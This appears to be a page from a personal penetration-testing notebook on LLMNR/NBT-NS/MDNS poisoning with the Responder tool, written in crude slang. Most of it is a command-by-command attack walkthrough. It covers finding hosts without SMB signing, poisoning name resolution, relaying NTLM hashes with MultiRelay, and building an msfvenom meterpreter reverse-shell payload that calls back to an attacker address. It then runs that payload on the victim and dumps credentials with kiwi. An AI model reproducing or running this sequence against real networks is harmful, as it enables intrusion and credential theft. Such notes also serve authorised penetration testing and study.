Responder

--LLMNR, NBT-NS and MDNS poisoning Attack Tool-- //need smb signing off to work. Check with: #python RunFinger.py -i <target ip> How the attack works: 1) Host A makes a DNS request for an SMB system that does not exist in the network. 2) Since this cannot be resolved by the internal DNS; an LLMNR NBT-NS broadcast goes out looking for this unknown system across the LAN 3) And what do we do bois? We respond from our box on the net, saying "thats me fucko". 4) And the little bish responds with its NTLMv1/v2 hash like a sucka. 5) tis tis crack it! bist bist pass it! tis tis bop it!

To exploit: https://book.hacktricks.xyz/pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks ------POC--------- //Find vuln hosts python RunFinger.py -i <cidr> //Turn off SMB and HTTP servers #vi /usr/share/responder/Responder.conf //start responder on correct interface and try to also downgrade tom LM if we can #./Responder.py -I tap0 --lm //watch for hosts, then start multirelay and leave responder running. //Will then pass the hash when we get it from responder #MultiRelay.py -t 172.16.23.101 -u ALL //target taken from responder, wait for miltirelay to catch a shell //Make a payload msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.23.10 LPORT=4444 -f exe > /root/data/payload.exe //Start handler msf> use exploit/multi/handler msf> set payload windows/x64/meterpreter/reverse_tcp //this is to match w/e we used for msfvenom //set your lport and lhost msf>run //go back to the shell we caught in MultiRelay and upload the payload #upload /root/data/payload.exe //execute payload #C:\windows\temp\payload.exe //we should now see the meterpreter shell being caught //we can now do some dumping meterpreter> load kiwi //attaches meterpreter extensions scripts meterpreter> help meterpreter> creds_all //dump creds meterpreter> meterpreter>

PreviousMITM NextSAM

Last updated 2 years ago